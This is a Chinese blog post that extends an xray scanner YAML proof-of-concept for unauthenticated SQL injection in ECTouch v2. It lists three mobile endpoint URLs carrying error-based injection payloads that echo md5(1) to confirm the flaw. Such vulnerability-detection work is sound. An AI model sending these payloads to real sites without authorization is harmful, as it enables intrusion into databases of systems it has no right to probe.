devbox
花生_TL007
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

xray插件改良7-poc-yaml-etouch-v2-sqli

作者:花生_TL007 | 2024-05-15 16:47:03

poc-yaml-etouch-v2-sqli

xray插件改良7-poc-yaml-etouch-v2-sqli

前言

原始yml

name: poc-yaml-etouch-v2-sqli
rules:
  - method: GET
    path: >-
      /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'
    expression: |
      response.status == 200 && response.body.bcontains(b"c4ca4238a0b923820dcc509a6f75849b")
detail:
  author: MaxSecurity(https://github.com/MaxSecurity)
  links:
    - https://github.com/mstxq17/CodeCheck/
    - https://www.anquanke.com/post/id/168991

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12

根据links作者的另一篇分析https://www.anquanke.com/post/id/169152?from=groupmessage#h3-13,前台无限制sql注入存在三处,所以改良之后

name: poc-yaml-etouch-v2-sqli
groups:
  sqli1:
    - method: GET
      path: >-
        /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'
      expression: |
        response.status == 200 && response.body.bcontains(b"c4ca4238a0b923820dcc509a6f75849b")
  sqli2:
    - method: GET
      path: >-
        /upload/mobile/index.php?c=category&a=async_list&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'
      expression: |
        response.status == 200 && response.body.bcontains(b"c4ca4238a0b923820dcc509a6f75849b")
  sqli3:
    - method: GET
      path: >-
        /upload/mobile/index.php?c=Exchange&a=asynclist_list&integral_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'
      expression: |
        response.status == 200 && response.body.bcontains(b"c4ca4238a0b923820dcc509a6f75849b")
detail:
  author: MaxSecurity(https://github.com/MaxSecurity)
  links:
    - https://github.com/mstxq17/CodeCheck/
    - https://www.anquanke.com/post/id/168991

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/花生_TL007/article/detail/573925
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号